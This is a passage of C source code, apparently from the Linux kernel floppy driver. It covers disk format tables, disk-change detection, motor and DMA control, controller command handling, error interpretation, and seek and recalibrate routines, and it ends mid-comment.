{ 2880,18,2,80,0,0x1B,0x00,0xCF,0x6C,"H1440" }, /* 7 1.44MB 3.5" */
{ 5760,36,2,80,0,0x1B,0x43,0xAF,0x54,"E2880" }, /* 8 2.88MB 3.5" */
{ 6240,39,2,80,0,0x1B,0x43,0xAF,0x28,"E3120" }, /* 9 3.12MB 3.5" */
{ 2880,18,2,80,0,0x25,0x00,0xDF,0x02,"h1440" }, /* 10 1.44MB 5.25" */
{ 3360,21,2,80,0,0x1C,0x00,0xCF,0x0C,"H1680" }, /* 11 1.68MB 3.5" */
{ 820,10,2,41,1,0x25,0x01,0xDF,0x2E,"h410" }, /* 12 410KB 5.25" */
{ 1640,10,2,82,0,0x25,0x02,0xDF,0x2E,"H820" }, /* 13 820KB 3.5" */
{ 2952,18,2,82,0,0x25,0x00,0xDF,0x02,"h1476" }, /* 14 1.48MB 5.25" */
{ 3444,21,2,82,0,0x25,0x00,0xDF,0x0C,"H1722" }, /* 15 1.72MB 3.5" */
{ 840,10,2,42,1,0x25,0x01,0xDF,0x2E,"h420" }, /* 16 420KB 5.25" */
{ 1660,10,2,83,0,0x25,0x02,0xDF,0x2E,"H830" }, /* 17 830KB 3.5" */
{ 2988,18,2,83,0,0x25,0x00,0xDF,0x02,"h1494" }, /* 18 1.49MB 5.25" */
{ 3486,21,2,83,0,0x25,0x00,0xDF,0x0C,"H1743" }, /* 19 1.74 MB 3.5" */
{ 1760,11,2,80,0,0x1C,0x09,0xCF,0x00,"h880" }, /* 20 880KB 5.25" */
{ 2080,13,2,80,0,0x1C,0x01,0xCF,0x00,"D1040" }, /* 21 1.04MB 3.5" */
{ 2240,14,2,80,0,0x1C,0x19,0xCF,0x00,"D1120" }, /* 22 1.12MB 3.5" */
{ 3200,20,2,80,0,0x1C,0x20,0xCF,0x2C,"h1600" }, /* 23 1.6MB 5.25" */
{ 3520,22,2,80,0,0x1C,0x08,0xCF,0x2e,"H1760" }, /* 24 1.76MB 3.5" */
{ 3840,24,2,80,0,0x1C,0x20,0xCF,0x00,"H1920" }, /* 25 1.92MB 3.5" */
{ 6400,40,2,80,0,0x25,0x5B,0xCF,0x00,"E3200" }, /* 26 3.20MB 3.5" */
{ 7040,44,2,80,0,0x25,0x5B,0xCF,0x00,"E3520" }, /* 27 3.52MB 3.5" */
{ 7680,48,2,80,0,0x25,0x63,0xCF,0x00,"E3840" }, /* 28 3.84MB 3.5" */
{ 3680,23,2,80,0,0x1C,0x10,0xCF,0x00,"H1840" }, /* 29 1.84MB 3.5" */
{ 1600,10,2,80,0,0x25,0x02,0xDF,0x2E,"D800" }, /* 30 800KB 3.5" */
{ 3200,20,2,80,0,0x1C,0x00,0xCF,0x2C,"H1600" }, /* 31 1.6MB 3.5" */
};
#define SECTSIZE (_FD_SECTSIZE(*floppy))
/* Auto-detection: Disk type used until the next media change occurs. */
static struct floppy_struct *current_type[N_DRIVE];
/*
* User-provided type information. current_type points to
* the respective entry of this array.
*/
static struct floppy_struct user_params[N_DRIVE];
static sector_t floppy_sizes[256];
static char floppy_device_name[] = "floppy";
/*
* The driver is trying to determine the correct media format
* while probing is set. rw_interrupt() clears it after a
* successful access.
*/
static int probing;
/* Synchronization of FDC access. */
#define FD_COMMAND_NONE -1
#define FD_COMMAND_ERROR 2
#define FD_COMMAND_OKAY 3
static volatile int command_status = FD_COMMAND_NONE;
static unsigned long fdc_busy;
static DECLARE_WAIT_QUEUE_HEAD(fdc_wait);
static DECLARE_WAIT_QUEUE_HEAD(command_done);
/* Errors during formatting are counted here. */
static int format_errors;
/* Format request descriptor. */
static struct format_descr format_req;
/*
* Rate is 0 for 500kb/s, 1 for 300kbps, 2 for 250kbps
* Spec1 is 0xSH, where S is stepping rate (F=1ms, E=2ms, D=3ms etc),
* H is head unload time (1=16ms, 2=32ms, etc)
*/
/*
* Track buffer
* Because these are written to by the DMA controller, they must
* not contain a 64k byte boundary crossing, or data will be
* corrupted/lost.
*/
static char *floppy_track_buffer;
static int max_buffer_sectors;
static int *errors;
typedef void (*done_f)(int);
static const struct cont_t {
void (*interrupt)(void);
/* this is called after the interrupt of the
* main command */
void (*redo)(void); /* this is called to retry the operation */
void (*error)(void); /* this is called to tally an error */
done_f done; /* this is called to say if the operation has
* succeeded/failed */
} *cont;
static void floppy_ready(void);
static void floppy_start(void);
static void process_fd_request(void);
static void recalibrate_floppy(void);
static void floppy_shutdown(struct work_struct *);
static int floppy_request_regions(int);
static void floppy_release_regions(int);
static int floppy_grab_irq_and_dma(void);
static void floppy_release_irq_and_dma(void);
/*
* The "reset" variable should be tested whenever an interrupt is scheduled,
* after the commands have been sent. This is to ensure that the driver doesn't
* get wedged when the interrupt doesn't come because of a failed command.
* reset doesn't need to be tested before sending commands, because
* output_byte is automatically disabled when reset is set.
*/
static void reset_fdc(void);
/*
* These are global variables, as that's the easiest way to give
* information to interrupts. They are the data used for the current
* request.
*/
#define NO_TRACK -1
#define NEED_1_RECAL -2
#define NEED_2_RECAL -3
static atomic_t usage_count = ATOMIC_INIT(0);
/* buffer related variables */
static int buffer_track = -1;
static int buffer_drive = -1;
static int buffer_min = -1;
static int buffer_max = -1;
/* fdc related variables, should end up in a struct */
static struct floppy_fdc_state fdc_state[N_FDC];
static int fdc; /* current fdc */
static struct workqueue_struct *floppy_wq;
static struct floppy_struct *_floppy = floppy_type;
static unsigned char current_drive;
static long current_count_sectors;
static unsigned char fsector_t; /* sector in track */
static unsigned char in_sector_offset; /* offset within physical sector,
* expressed in units of 512 bytes */
static inline bool drive_no_geom(int drive)
{
return !current_type[drive] && !ITYPE(UDRS->fd_device);
}
#ifndef fd_eject
static inline int fd_eject(int drive)
{
return -EINVAL;
}
#endif
/*
* Debugging
* =========
*/
#ifdef DEBUGT
static long unsigned debugtimer;
static inline void set_debugt(void)
{
debugtimer = jiffies;
}
static inline void debugt(const char *func, const char *msg)
{
if (DP->flags & DEBUGT)
pr_info("%s:%s dtime=%lu\n", func, msg, jiffies - debugtimer);
}
#else
static inline void set_debugt(void) { }
static inline void debugt(const char *func, const char *msg) { }
#endif /* DEBUGT */
static DECLARE_DELAYED_WORK(fd_timeout, floppy_shutdown);
static const char *timeout_message;
static void is_alive(const char *func, const char *message)
{
/* this routine checks whether the floppy driver is "alive" */
if (test_bit(0, &fdc_busy) && command_status < 2 &&
!delayed_work_pending(&fd_timeout)) {
DPRINT("%s: timeout handler died. %s\n", func, message);
}
}
static void (*do_floppy)(void) = NULL;
#define OLOGSIZE 20
static void (*lasthandler)(void);
static unsigned long interruptjiffies;
static unsigned long resultjiffies;
static int resultsize;
static unsigned long lastredo;
static struct output_log {
unsigned char data;
unsigned char status;
unsigned long jiffies;
} output_log[OLOGSIZE];
static int output_log_pos;
#define current_reqD -1
#define MAXTIMEOUT -2
static void __reschedule_timeout(int drive, const char *message)
{
unsigned long delay;
if (drive == current_reqD)
drive = current_drive;
if (drive < 0 || drive >= N_DRIVE) {
delay = 20UL * HZ;
drive = 0;
} else
delay = UDP->timeout;
mod_delayed_work(floppy_wq, &fd_timeout, delay);
if (UDP->flags & FD_DEBUG)
DPRINT("reschedule timeout %s\n", message);
timeout_message = message;
}
static void reschedule_timeout(int drive, const char *message)
{
unsigned long flags;
spin_lock_irqsave(&floppy_lock, flags);
__reschedule_timeout(drive, message);
spin_unlock_irqrestore(&floppy_lock, flags);
}
#define INFBOUND(a, b) (a) = max_t(int, a, b)
#define SUPBOUND(a, b) (a) = min_t(int, a, b)
/*
* Bottom half floppy driver.
* ==========================
*
* This part of the file contains the code talking directly to the hardware,
* and also the main service loop (seek-configure-spinup-command)
*/
/*
* disk change.
* This routine is responsible for maintaining the FD_DISK_CHANGE flag,
* and the last_checked date.
*
* last_checked is the date of the last check which showed 'no disk change'
* FD_DISK_CHANGE is set under two conditions:
* 1. The floppy has been changed after some i/o to that floppy already
* took place.
* 2. No floppy disk is in the drive. This is done in order to ensure that
* requests are quickly flushed in case there is no disk in the drive. It
* follows that FD_DISK_CHANGE can only be cleared if there is a disk in
* the drive.
*
* For 1., maxblock is observed. Maxblock is 0 if no i/o has taken place yet.
* For 2., FD_DISK_NEWCHANGE is watched. FD_DISK_NEWCHANGE is cleared on
* each seek. If a disk is present, the disk change line should also be
* cleared on each seek. Thus, if FD_DISK_NEWCHANGE is clear, but the disk
* change line is set, this means either that no disk is in the drive, or
* that it has been removed since the last seek.
*
* This means that we really have a third possibility too:
* The floppy has been changed after the last seek.
*/
static int disk_change(int drive)
{
int fdc = FDC(drive);
if (time_before(jiffies, UDRS->select_date + UDP->select_delay))
DPRINT("WARNING disk change called early\n");
if (!(FDCS->dor & (0x10 << UNIT(drive))) ||
(FDCS->dor & 3) != UNIT(drive) || fdc != FDC(drive)) {
DPRINT("probing disk change on unselected drive\n");
DPRINT("drive=%d fdc=%d dor=%x\n", drive, FDC(drive),
(unsigned int)FDCS->dor);
}
debug_dcl(UDP->flags,
"checking disk change line for drive %d\n", drive);
debug_dcl(UDP->flags, "jiffies=%lu\n", jiffies);
debug_dcl(UDP->flags, "disk change line=%x\n", fd_inb(FD_DIR) & 0x80);
debug_dcl(UDP->flags, "flags=%lx\n", UDRS->flags);
if (UDP->flags & FD_BROKEN_DCL)
return test_bit(FD_DISK_CHANGED_BIT, &UDRS->flags);
if ((fd_inb(FD_DIR) ^ UDP->flags) & 0x80) {
set_bit(FD_VERIFY_BIT, &UDRS->flags);
/* verify write protection */
if (UDRS->maxblock) /* mark it changed */
set_bit(FD_DISK_CHANGED_BIT, &UDRS->flags);
/* invalidate its geometry */
if (UDRS->keep_data >= 0) {
if ((UDP->flags & FTD_MSG) &&
current_type[drive] != NULL)
DPRINT("Disk type is undefined after disk change\n");
current_type[drive] = NULL;
floppy_sizes[TOMINOR(drive)] = MAX_DISK_SIZE << 1;
}
return 1;
} else {
UDRS->last_checked = jiffies;
clear_bit(FD_DISK_NEWCHANGE_BIT, &UDRS->flags);
}
return 0;
}
static inline int is_selected(int dor, int unit)
{
return ((dor & (0x10 << unit)) && (dor & 3) == unit);
}
static bool is_ready_state(int status)
{
int state = status & (STATUS_READY | STATUS_DIR | STATUS_DMA);
return state == STATUS_READY;
}
static int set_dor(int fdc, char mask, char data)
{
unsigned char unit;
unsigned char drive;
unsigned char newdor;
unsigned char olddor;
if (FDCS->address == -1)
return -1;
olddor = FDCS->dor;
newdor = (olddor & mask) | data;
if (newdor != olddor) {
unit = olddor & 0x3;
if (is_selected(olddor, unit) && !is_selected(newdor, unit)) {
drive = REVDRIVE(fdc, unit);
debug_dcl(UDP->flags,
"calling disk change from set_dor\n");
disk_change(drive);
}
FDCS->dor = newdor;
fd_outb(newdor, FD_DOR);
unit = newdor & 0x3;
if (!is_selected(olddor, unit) && is_selected(newdor, unit)) {
drive = REVDRIVE(fdc, unit);
UDRS->select_date = jiffies;
}
}
return olddor;
}
static void twaddle(void)
{
if (DP->select_delay)
return;
fd_outb(FDCS->dor & ~(0x10 << UNIT(current_drive)), FD_DOR);
fd_outb(FDCS->dor, FD_DOR);
DRS->select_date = jiffies;
}
/*
* Reset all driver information about the current fdc.
* This is needed after a reset, and after a raw command.
*/
static void reset_fdc_info(int mode)
{
int drive;
FDCS->spec1 = FDCS->spec2 = -1;
FDCS->need_configure = 1;
FDCS->perp_mode = 1;
FDCS->rawcmd = 0;
for (drive = 0; drive < N_DRIVE; drive++)
if (FDC(drive) == fdc && (mode || UDRS->track != NEED_1_RECAL))
UDRS->track = NEED_2_RECAL;
}
/* selects the fdc and drive, and enables the fdc's input/dma. */
static void set_fdc(int drive)
{
if (drive >= 0 && drive < N_DRIVE) {
fdc = FDC(drive);
current_drive = drive;
}
if (fdc != 1 && fdc != 0) {
pr_info("bad fdc value\n");
return;
}
set_dor(fdc, ~0, 8);
#if N_FDC > 1
set_dor(1 - fdc, ~8, 0);
#endif
if (FDCS->rawcmd == 2)
reset_fdc_info(1);
if (fd_inb(FD_STATUS) != STATUS_READY)
FDCS->reset = 1;
}
/* locks the driver */
static int lock_fdc(int drive)
{
if (WARN(atomic_read(&usage_count) == 0,
"Trying to lock fdc while usage count=0\n"))
return -1;
if (wait_event_interruptible(fdc_wait, !test_and_set_bit(0, &fdc_busy)))
return -EINTR;
command_status = FD_COMMAND_NONE;
reschedule_timeout(drive, "lock fdc");
set_fdc(drive);
return 0;
}
/* unlocks the driver */
static void unlock_fdc(void)
{
if (!test_bit(0, &fdc_busy))
DPRINT("FDC access conflict!\n");
raw_cmd = NULL;
command_status = FD_COMMAND_NONE;
cancel_delayed_work(&fd_timeout);
do_floppy = NULL;
cont = NULL;
clear_bit(0, &fdc_busy);
wake_up(&fdc_wait);
}
/* switches the motor off after a given timeout */
static void motor_off_callback(struct timer_list *t)
{
unsigned long nr = t - motor_off_timer;
unsigned char mask = ~(0x10 << UNIT(nr));
if (WARN_ON_ONCE(nr >= N_DRIVE))
return;
set_dor(FDC(nr), mask, 0);
}
/* schedules motor off */
static void floppy_off(unsigned int drive)
{
unsigned long volatile delta;
int fdc = FDC(drive);
if (!(FDCS->dor & (0x10 << UNIT(drive))))
return;
del_timer(motor_off_timer + drive);
/* make spindle stop in a position which minimizes spinup time
* next time */
if (UDP->rps) {
delta = jiffies - UDRS->first_read_date + HZ -
UDP->spindown_offset;
delta = ((delta * UDP->rps) % HZ) / UDP->rps;
motor_off_timer[drive].expires =
jiffies + UDP->spindown - delta;
}
add_timer(motor_off_timer + drive);
}
/*
* cycle through all N_DRIVE floppy drives, for disk change testing.
* stopping at current drive. This is done before any long operation, to
* be sure to have up to date disk change information.
*/
static void scandrives(void)
{
int i;
int drive;
int saved_drive;
if (DP->select_delay)
return;
saved_drive = current_drive;
for (i = 0; i < N_DRIVE; i++) {
drive = (saved_drive + i + 1) % N_DRIVE;
if (UDRS->fd_ref == 0 || UDP->select_delay != 0)
continue; /* skip closed drives */
set_fdc(drive);
if (!(set_dor(fdc, ~3, UNIT(drive) | (0x10 << UNIT(drive))) &
(0x10 << UNIT(drive))))
/* switch the motor off again, if it was off to
* begin with */
set_dor(fdc, ~(0x10 << UNIT(drive)), 0);
}
set_fdc(saved_drive);
}
static void empty(void)
{
}
static void (*floppy_work_fn)(void);
static void floppy_work_workfn(struct work_struct *work)
{
floppy_work_fn();
}
static DECLARE_WORK(floppy_work, floppy_work_workfn);
static void schedule_bh(void (*handler)(void))
{
WARN_ON(work_pending(&floppy_work));
floppy_work_fn = handler;
queue_work(floppy_wq, &floppy_work);
}
static void (*fd_timer_fn)(void) = NULL;
static void fd_timer_workfn(struct work_struct *work)
{
fd_timer_fn();
}
static DECLARE_DELAYED_WORK(fd_timer, fd_timer_workfn);
static void cancel_activity(void)
{
do_floppy = NULL;
cancel_delayed_work_sync(&fd_timer);
cancel_work_sync(&floppy_work);
}
/* this function makes sure that the disk stays in the drive during the
* transfer */
static void fd_watchdog(void)
{
debug_dcl(DP->flags, "calling disk change from watchdog\n");
if (disk_change(current_drive)) {
DPRINT("disk removed during i/o\n");
cancel_activity();
cont->done(0);
reset_fdc();
} else {
cancel_delayed_work(&fd_timer);
fd_timer_fn = fd_watchdog;
queue_delayed_work(floppy_wq, &fd_timer, HZ / 10);
}
}
static void main_command_interrupt(void)
{
cancel_delayed_work(&fd_timer);
cont->interrupt();
}
/* waits for a delay (spinup or select) to pass */
static int fd_wait_for_completion(unsigned long expires,
void (*function)(void))
{
if (FDCS->reset) {
reset_fdc(); /* do the reset during sleep to win time
* if we don't need to sleep, it's a good
* occasion anyways */
return 1;
}
if (time_before(jiffies, expires)) {
cancel_delayed_work(&fd_timer);
fd_timer_fn = function;
queue_delayed_work(floppy_wq, &fd_timer, expires - jiffies);
return 1;
}
return 0;
}
static void setup_DMA(void)
{
unsigned long f;
if (raw_cmd->length == 0) {
int i;
pr_info("zero dma transfer size:");
for (i = 0; i < raw_cmd->cmd_count; i++)
pr_cont("%x,", raw_cmd->cmd[i]);
pr_cont("\n");
cont->done(0);
FDCS->reset = 1;
return;
}
if (((unsigned long)raw_cmd->kernel_data) % 512) {
pr_info("non aligned address: %p\n", raw_cmd->kernel_data);
cont->done(0);
FDCS->reset = 1;
return;
}
f = claim_dma_lock();
fd_disable_dma();
#ifdef fd_dma_setup
if (fd_dma_setup(raw_cmd->kernel_data, raw_cmd->length,
(raw_cmd->flags & FD_RAW_READ) ?
DMA_MODE_READ : DMA_MODE_WRITE, FDCS->address) < 0) {
release_dma_lock(f);
cont->done(0);
FDCS->reset = 1;
return;
}
release_dma_lock(f);
#else
fd_clear_dma_ff();
fd_cacheflush(raw_cmd->kernel_data, raw_cmd->length);
fd_set_dma_mode((raw_cmd->flags & FD_RAW_READ) ?
DMA_MODE_READ : DMA_MODE_WRITE);
fd_set_dma_addr(raw_cmd->kernel_data);
fd_set_dma_count(raw_cmd->length);
virtual_dma_port = FDCS->address;
fd_enable_dma();
release_dma_lock(f);
#endif
}
static void show_floppy(void);
/* waits until the fdc becomes ready */
static int wait_til_ready(void)
{
int status;
int counter;
if (FDCS->reset)
return -1;
for (counter = 0; counter < 10000; counter++) {
status = fd_inb(FD_STATUS);
if (status & STATUS_READY)
return status;
}
if (initialized) {
DPRINT("Getstatus times out (%x) on fdc %d\n", status, fdc);
show_floppy();
}
FDCS->reset = 1;
return -1;
}
/* sends a command byte to the fdc */
static int output_byte(char byte)
{
int status = wait_til_ready();
if (status < 0)
return -1;
if (is_ready_state(status)) {
fd_outb(byte, FD_DATA);
output_log[output_log_pos].data = byte;
output_log[output_log_pos].status = status;
output_log[output_log_pos].jiffies = jiffies;
output_log_pos = (output_log_pos + 1) % OLOGSIZE;
return 0;
}
FDCS->reset = 1;
if (initialized) {
DPRINT("Unable to send byte %x to FDC. Fdc=%x Status=%x\n",
byte, fdc, status);
show_floppy();
}
return -1;
}
/* gets the response from the fdc */
static int result(void)
{
int i;
int status = 0;
for (i = 0; i < MAX_REPLIES; i++) {
status = wait_til_ready();
if (status < 0)
break;
status &= STATUS_DIR | STATUS_READY | STATUS_BUSY | STATUS_DMA;
if ((status & ~STATUS_BUSY) == STATUS_READY) {
resultjiffies = jiffies;
resultsize = i;
return i;
}
if (status == (STATUS_DIR | STATUS_READY | STATUS_BUSY))
reply_buffer[i] = fd_inb(FD_DATA);
else
break;
}
if (initialized) {
DPRINT("get result error. Fdc=%d Last status=%x Read bytes=%d\n",
fdc, status, i);
show_floppy();
}
FDCS->reset = 1;
return -1;
}
#define MORE_OUTPUT -2
/* does the fdc need more output? */
static int need_more_output(void)
{
int status = wait_til_ready();
if (status < 0)
return -1;
if (is_ready_state(status))
return MORE_OUTPUT;
return result();
}
/* Set perpendicular mode as required, based on data rate, if supported.
* 82077 Now tested. 1Mbps data rate only possible with 82077-1.
*/
static void perpendicular_mode(void)
{
unsigned char perp_mode;
if (raw_cmd->rate & 0x40) {
switch (raw_cmd->rate & 3) {
case 0:
perp_mode = 2;
break;
case 3:
perp_mode = 3;
break;
default:
DPRINT("Invalid data rate for perpendicular mode!\n");
cont->done(0);
FDCS->reset = 1;
/*
* convenient way to return to
* redo without too much hassle
* (deep stack et al.)
*/
return;
}
} else
perp_mode = 0;
if (FDCS->perp_mode == perp_mode)
return;
if (FDCS->version >= FDC_82077_ORIG) {
output_byte(FD_PERPENDICULAR);
output_byte(perp_mode);
FDCS->perp_mode = perp_mode;
} else if (perp_mode) {
DPRINT("perpendicular mode not supported by this FDC.\n");
}
} /* perpendicular_mode */
static int fifo_depth = 0xa;
static int no_fifo;
static int fdc_configure(void)
{
/* Turn on FIFO */
output_byte(FD_CONFIGURE);
if (need_more_output() != MORE_OUTPUT)
return 0;
output_byte(0);
output_byte(0x10 | (no_fifo & 0x20) | (fifo_depth & 0xf));
output_byte(0); /* pre-compensation from track
0 upwards */
return 1;
}
#define NOMINAL_DTR 500
/* Issue a "SPECIFY" command to set the step rate time, head unload time,
* head load time, and DMA disable flag to values needed by floppy.
*
* The value "dtr" is the data transfer rate in Kbps. It is needed
* to account for the data rate-based scaling done by the 82072 and 82077
* FDC types. This parameter is ignored for other types of FDCs (i.e.
* 8272a).
*
* Note that changing the data transfer rate has a (probably deleterious)
* effect on the parameters subject to scaling for 82072/82077 FDCs, so
* fdc_specify is called again after each data transfer rate
* change.
*
* srt: 1000 to 16000 in microseconds
* hut: 16 to 240 milliseconds
* hlt: 2 to 254 milliseconds
*
* These values are rounded up to the next highest available delay time.
*/
static void fdc_specify(void)
{
unsigned char spec1;
unsigned char spec2;
unsigned long srt;
unsigned long hlt;
unsigned long hut;
unsigned long dtr = NOMINAL_DTR;
unsigned long scale_dtr = NOMINAL_DTR;
int hlt_max_code = 0x7f;
int hut_max_code = 0xf;
if (FDCS->need_configure && FDCS->version >= FDC_82072A) {
fdc_configure();
FDCS->need_configure = 0;
}
switch (raw_cmd->rate & 0x03) {
case 3:
dtr = 1000;
break;
case 1:
dtr = 300;
if (FDCS->version >= FDC_82078) {
/* chose the default rate table, not the one
* where 1 = 2 Mbps */
output_byte(FD_DRIVESPEC);
if (need_more_output() == MORE_OUTPUT) {
output_byte(UNIT(current_drive));
output_byte(0xc0);
}
}
break;
case 2:
dtr = 250;
break;
}
if (FDCS->version >= FDC_82072) {
scale_dtr = dtr;
hlt_max_code = 0x00; /* 0==256msec*dtr0/dtr (not linear!) */
hut_max_code = 0x0; /* 0==256msec*dtr0/dtr (not linear!) */
}
/* Convert step rate from microseconds to milliseconds and 4 bits */
srt = 16 - DIV_ROUND_UP(DP->srt * scale_dtr / 1000, NOMINAL_DTR);
if (slow_floppy)
srt = srt / 4;
SUPBOUND(srt, 0xf);
INFBOUND(srt, 0);
hlt = DIV_ROUND_UP(DP->hlt * scale_dtr / 2, NOMINAL_DTR);
if (hlt < 0x01)
hlt = 0x01;
else if (hlt > 0x7f)
hlt = hlt_max_code;
hut = DIV_ROUND_UP(DP->hut * scale_dtr / 16, NOMINAL_DTR);
if (hut < 0x1)
hut = 0x1;
else if (hut > 0xf)
hut = hut_max_code;
spec1 = (srt << 4) | hut;
spec2 = (hlt << 1) | (use_virtual_dma & 1);
/* If these parameters did not change, just return with success */
if (FDCS->spec1 != spec1 || FDCS->spec2 != spec2) {
/* Go ahead and set spec1 and spec2 */
output_byte(FD_SPECIFY);
output_byte(FDCS->spec1 = spec1);
output_byte(FDCS->spec2 = spec2);
}
} /* fdc_specify */
/* Set the FDC's data transfer rate on behalf of the specified drive.
* NOTE: with 82072/82077 FDCs, changing the data rate requires a reissue
* of the specify command (i.e. using the fdc_specify function).
*/
static int fdc_dtr(void)
{
/* If data rate not already set to desired value, set it. */
if ((raw_cmd->rate & 3) == FDCS->dtr)
return 0;
/* Set dtr */
fd_outb(raw_cmd->rate & 3, FD_DCR);
/* TODO: some FDC/drive combinations (C&T 82C711 with TEAC 1.2MB)
* need a stabilization period of several milliseconds to be
* enforced after data rate changes before R/W operations.
* Pause 5 msec to avoid trouble. (Needs to be 2 jiffies)
*/
FDCS->dtr = raw_cmd->rate & 3;
return fd_wait_for_completion(jiffies + 2UL * HZ / 100, floppy_ready);
} /* fdc_dtr */
static void tell_sector(void)
{
pr_cont(": track %d, head %d, sector %d, size %d",
R_TRACK, R_HEAD, R_SECTOR, R_SIZECODE);
} /* tell_sector */
static void print_errors(void)
{
DPRINT("");
if (ST0 & ST0_ECE) {
pr_cont("Recalibrate failed!");
} else if (ST2 & ST2_CRC) {
pr_cont("data CRC error");
tell_sector();
} else if (ST1 & ST1_CRC) {
pr_cont("CRC error");
tell_sector();
} else if ((ST1 & (ST1_MAM | ST1_ND)) ||
(ST2 & ST2_MAM)) {
if (!probing) {
pr_cont("sector not found");
tell_sector();
} else
pr_cont("probe failed...");
} else if (ST2 & ST2_WC) { /* seek error */
pr_cont("wrong cylinder");
} else if (ST2 & ST2_BC) { /* cylinder marked as bad */
pr_cont("bad cylinder");
} else {
pr_cont("unknown error. ST[0..2] are: 0x%x 0x%x 0x%x",
ST0, ST1, ST2);
tell_sector();
}
pr_cont("\n");
}
/*
* OK, this error interpreting routine is called after a
* DMA read/write has succeeded
* or failed, so we check the results, and copy any buffers.
* hhb: Added better error reporting.
* ak: Made this into a separate routine.
*/
static int interpret_errors(void)
{
char bad;
if (inr != 7) {
DPRINT("-- FDC reply error\n");
FDCS->reset = 1;
return 1;
}
/* check IC to find cause of interrupt */
switch (ST0 & ST0_INTR) {
case 0x40: /* error occurred during command execution */
if (ST1 & ST1_EOC)
return 0; /* occurs with pseudo-DMA */
bad = 1;
if (ST1 & ST1_WP) {
DPRINT("Drive is write protected\n");
clear_bit(FD_DISK_WRITABLE_BIT, &DRS->flags);
cont->done(0);
bad = 2;
} else if (ST1 & ST1_ND) {
set_bit(FD_NEED_TWADDLE_BIT, &DRS->flags);
} else if (ST1 & ST1_OR) {
if (DP->flags & FTD_MSG)
DPRINT("Over/Underrun - retrying\n");
bad = 0;
} else if (*errors >= DP->max_errors.reporting) {
print_errors();
}
if (ST2 & ST2_WC || ST2 & ST2_BC)
/* wrong cylinder => recal */
DRS->track = NEED_2_RECAL;
return bad;
case 0x80: /* invalid command given */
DPRINT("Invalid FDC command given!\n");
cont->done(0);
return 2;
case 0xc0:
DPRINT("Abnormal termination caused by polling\n");
cont->error();
return 2;
default: /* (0) Normal command termination */
return 0;
}
}
/*
* This routine is called when everything should be correctly set up
* for the transfer (i.e. floppy motor is on, the correct floppy is
* selected, and the head is sitting on the right track).
*/
static void setup_rw_floppy(void)
{
int i;
int r;
int flags;
unsigned long ready_date;
void (*function)(void);
flags = raw_cmd->flags;
if (flags & (FD_RAW_READ | FD_RAW_WRITE))
flags |= FD_RAW_INTR;
if ((flags & FD_RAW_SPIN) && !(flags & FD_RAW_NO_MOTOR)) {
ready_date = DRS->spinup_date + DP->spinup;
/* If spinup will take a long time, rerun scandrives
* again just before spinup completion. Beware that
* after scandrives, we must again wait for selection.
*/
if (time_after(ready_date, jiffies + DP->select_delay)) {
ready_date -= DP->select_delay;
function = floppy_start;
} else
function = setup_rw_floppy;
/* wait until the floppy is spinning fast enough */
if (fd_wait_for_completion(ready_date, function))
return;
}
if ((flags & FD_RAW_READ) || (flags & FD_RAW_WRITE))
setup_DMA();
if (flags & FD_RAW_INTR)
do_floppy = main_command_interrupt;
r = 0;
for (i = 0; i < raw_cmd->cmd_count; i++)
r |= output_byte(raw_cmd->cmd[i]);
debugt(__func__, "rw_command");
if (r) {
cont->error();
reset_fdc();
return;
}
if (!(flags & FD_RAW_INTR)) {
inr = result();
cont->interrupt();
} else if (flags & FD_RAW_NEED_DISK)
fd_watchdog();
}
static int blind_seek;
/*
* This is the routine called after every seek (or recalibrate) interrupt
* from the floppy controller.
*/
static void seek_interrupt(void)
{
debugt(__func__, "");
if (inr != 2 || (ST0 & 0xF8) != 0x20) {
DPRINT("seek failed\n");
DRS->track = NEED_2_RECAL;
cont->error();
cont->redo();
return;
}
if (DRS->track >= 0 && DRS->track != ST1 && !blind_seek) {
debug_dcl(DP->flags,
"clearing NEWCHANGE flag because of effective seek\n");
debug_dcl(DP->flags, "jiffies=%lu\n", jiffies);
clear_bit(FD_DISK_NEWCHANGE_BIT, &DRS->flags);
/* effective seek */
DRS->select_date = jiffies;
}
DRS->track = ST1;
floppy_ready();
}
static void check_wp(void)
{
if (test_bit(FD_VERIFY_BIT, &DRS->flags)) {
/* check write protection */
output_byte(FD_GETSTATUS);
output_byte(UNIT(current_drive));
if (result() != 1) {
FDCS->reset = 1;
return;
}
clear_bit(FD_VERIFY_BIT, &DRS->flags);
clear_bit(FD_NEED_TWADDLE_BIT, &DRS->flags);
debug_dcl(DP->flags,
"checking whether disk is write protected\n");
debug_dcl(DP->flags, "wp=%x\n", ST3 & 0x40);
if (!(ST3 & 0x40))
set_bit(FD_DISK_WRITABLE_BIT, &DRS->flags);
else
clear_bit(FD_DISK_WRITABLE_BIT, &DRS->flags);
}
}
static void seek_floppy(void)
{
int track;
blind_seek = 0;
debug_dcl(DP->flags, "calling disk change from %s\n", __func__);
if (!test_bit(FD_DISK_NEWCHANGE_BIT, &DRS->flags) &&
disk_change(current_drive) && (raw_cmd->flags & FD_RAW_NEED_DISK)) {
/* the media changed flag should be cleared after the seek.
* If it isn't, this means that there is really no disk in
* the drive.
*/
set_bit(FD_DISK_CHANGED_BIT, &DRS->flags);
cont->done(0);
cont->redo();
return;
}
if (DRS->track <= NEED_1_RECAL) {
recalibrate_floppy();
return;
} else if (test_bit(FD_DISK_NEWCHANGE_BIT, &DRS->flags) &&
(raw_cmd->flags & FD_RAW_NEED_DISK) &&
(DRS->track <= NO_TRACK || DRS->track == raw_cmd->track)) {
/* we seek to clear the media-changed condition. Does anybody
* know a more elegant way, which works on all drives? */
if (raw_cmd->track)
track = raw_cmd->track - 1;
else {
if (DP->flags & FD_SILENT_DCL_CLEAR) {
set_dor(fdc, ~(0x10 << UNIT(current_drive)), 0);
blind_seek = 1;
raw_cmd->flags |= FD_RAW_NEED_SEEK;
}
track = 1;
}
} else {
check_wp();
if (raw_cmd->track != DRS->track &&
(raw_cmd->flags & FD_RAW_NEED_SEEK))
track = raw_cmd->track;
else {
setup_rw_floppy();
return;
}
}
do_floppy = seek_interrupt;
output_byte(FD_SEEK);
output_byte(UNIT(current_drive));
if (output_byte(track) < 0) {
reset_fdc();
return;
}
debugt(__func__, "");
}
static void recal_interrupt(void)
{
debugt(__func__, "");
if (inr != 2)
FDCS->reset = 1;
else if (ST0 & ST0_ECE) {
switch (DRS->track) {
case NEED_1_RECAL:
debugt(__func__, "need 1 recal");
/* after a second recalibrate, we still haven't
* reached track 0. Probably no drive. Raise an
* error, as failing immediately might upset
* computers possessed by the Devil :-) */
cont->error();
cont->redo();
return;
case NEED_2_RECAL:
debugt(__func__, "need 2 recal");
/* If we already did a recalibrate,
* and we are not at track 0, this
* means we have moved. (The only way
